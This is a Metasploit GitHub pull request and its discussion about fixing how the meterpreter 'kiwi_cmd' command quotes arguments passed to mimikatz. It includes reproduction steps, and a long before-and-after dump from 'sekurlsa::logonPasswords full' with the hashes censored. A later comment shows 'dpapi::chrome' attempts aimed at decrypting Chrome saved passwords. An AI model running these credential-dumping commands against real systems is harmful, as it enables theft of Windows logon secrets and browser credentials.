Wrap kiwi cmd arguments in quotes #14802

Merged

@dwelch-r7 (Contributor) commented Feb 24, 2021

Resolves #14136

Kiwi expects commands with an argument to be wrapped in quotes, but we weren't doing that even when the user would wrap it in quotes on the meterpreter prompt. This PR resolves that by wrapping each command in quotes so kiwi can parse it correctly.

Verification

  • Get a native meterpreter shell on windows (i.e. using windows/x64/meterpreter_reverse_http)
  • Interact with the session sessions -1
  • Run getsystem (some kiwi commands require a privileged account)
  • Run load kiwi
  • Run kiwi_cmd "sekurlsa::logonPasswords full"
  • You should see a line like this: mimikatz(powershell) # sekurlsa::logonPasswords full. Previously the full would be run as a separate command, which does not work.

@gwillcox-r7 gwillcox-r7 self-assigned this Feb 24, 2021
@gwillcox-r7 (Contributor) commented Feb 24, 2021

Before:
meterpreter > kiwi_cmd "sekurlsa::logonPasswords full"
*redacted output*
mimikatz(powershell) # full
ERROR mimikatz_doLocal ; "full" command of "standard" module not found !

Module :	standard
Full name :	Standard module
Description :	Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

meterpreter > 
After:
meterpreter > kiwi_cmd "sekurlsa::logonPasswords full"

Authentication Id : 0 ; 11780027 (00000000:00b3bfbb)
Session           : RemoteInteractive from 2
User Name         : Administrator
Domain            : WIN-QKA9JKS5MVU
Logon Server      : WIN-QKA9JKS5MVU
Logon Time        : 2/19/2021 10:16:49 AM
SID               : S-1-5-21-2479325116-3149349649-1743567484-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * NTLM     : *censored*
	 * SHA1     : *censored*
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 11752265 (00000000:00b35349)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2/18/2021 4:53:57 PM
SID               : S-1-5-90-0-2
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 11751839 (00000000:00b3519f)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2/18/2021 4:53:57 PM
SID               : S-1-5-90-0-2
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 84122 (00000000:0001489a)
Session           : Service from 0
User Name         : WMI Mapper
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-80-2306818404-1449075829-5196792-1933587401-709886547
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 82177 (00000000:00014101)
Session           : Service from 0
User Name         : SQLTELEMETRY$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : SQLTELEMETRY$SQLEXPRESS
	 * Domain   : NT Service
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 80875 (00000000:00013beb)
Session           : Service from 0
User Name         : Administrator
Domain            : WIN-QKA9JKS5MVU
Logon Server      : WIN-QKA9JKS5MVU
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-21-2479325116-3149349649-1743567484-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * NTLM     : *censored*
	 * SHA1     : *censored*
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 43820 (00000000:0000ab2c)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : S-1-5-90-0-1
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-QKA9JKS5MVU$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : S-1-5-20
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : win-qka9jks5mvu$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 22946 (00000000:000059a2)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : 
	msv :	
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 83340 (00000000:0001458c)
Session           : Service from 0
User Name         : WbemConsumer
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-80-3833276825-528460201-2555912059-1703007875-3587489905
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 81702 (00000000:00013f26)
Session           : Service from 0
User Name         : MSSQL$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : MSSQL$SQLEXPRESS
	 * Domain   : NT Service
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 81688 (00000000:00013f18)
Session           : Service from 0
User Name         : Administrator
Domain            : WIN-QKA9JKS5MVU
Logon Server      : WIN-QKA9JKS5MVU
Logon Time        : 2/15/2021 6:01:13 PM
SID               : S-1-5-21-2479325116-3149349649-1743567484-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * NTLM     : *censored*
	 * SHA1     : *censored*
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : WIN-QKA9JKS5MVU
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 43875 (00000000:0000ab63)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : S-1-5-90-0-1
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-QKA9JKS5MVU$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2/15/2021 6:01:08 PM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN-QKA9JKS5MVU$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : win-qka9jks5mvu$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

meterpreter > 

@gwillcox-r7 (Contributor) left a review comment

Proposed code changes look good to land, thanks for referencing the quote from the official wiki as well for passersby!

@gwillcox-r7 (Contributor) commented

Tests complete and code looks good! Landing now...

@gwillcox-r7 gwillcox-r7 merged commit 8f1ad11 into rapid7:master Feb 24, 2021
@gwillcox-r7 (Contributor) commented Feb 24, 2021

Release Notes

Fixed a bug involving the Kiwi library where commands passed to Kiwi via the kiwi_cmd command in Metasploit were not properly enclosed in double quotes, which could lead to Kiwi thinking the user had passed it separate commands to execute rather than one space-separated command.

@ForDockerImage commented Aug 31, 2021

Release Notes

Fixed a bug involving the Kiwi library where commands passed to Kiwi via the kiwi_cmd command in Metasploit were not properly enclosed in double quotes, which could lead to Kiwi thinking the user had passed it separate commands to execute rather than one space-separated command.

thanks for trying to help solve my problem, but nothing works for me :)

Does not work for me:

kiwi_cmd "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User\\ Data\\Default\\Login\\ Data\" /unprotect"
kiwi_cmd "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User\ Data\\Default\\Login\ Data\" /unprotect"
kiwi_cmd "dpapi::chrome /in:"%localappdata%\Google\Chrome\User\ Data\Default\Login\\ Data" /unprotect"
kiwi_cmd "dpapi::chrome /in:'%localappdata%\Google\Chrome\User\ Data\Default\Login\\ Data' /unprotect"

from .rc script

# %q{} keeps the embedded double quotes as literal characters; inside a plain
# double-quoted Ruby literal the first embedded quote would end the string.
cmd = %q{dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect}
cmd = Shellwords.escape(cmd)
# run_single executes one console line, so the string it gets is the
# command plus its (already escaped) arguments
run_single(cmd)

My method cmd_kiwi_cmd:
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb

  def cmd_kiwi_cmd(*args)
    # Kiwi expects instructions with arguments to be quoted so quote everything to be sure
    # "You can pass instructions on mimikatz command line, those with arguments/spaces must be quoted."
    # Quote from: https://github.com/gentilkiwi/mimikatz/wiki
    output = client.kiwi.exec_cmd(args.map { |s| '"' + s + '"'}.join(' '))
    print_line(output)
  end

Is there anyone who tested it and who knows how to fix it?)

Linked issue: kiwi_cmd does not correctly handle commands with multiple arguments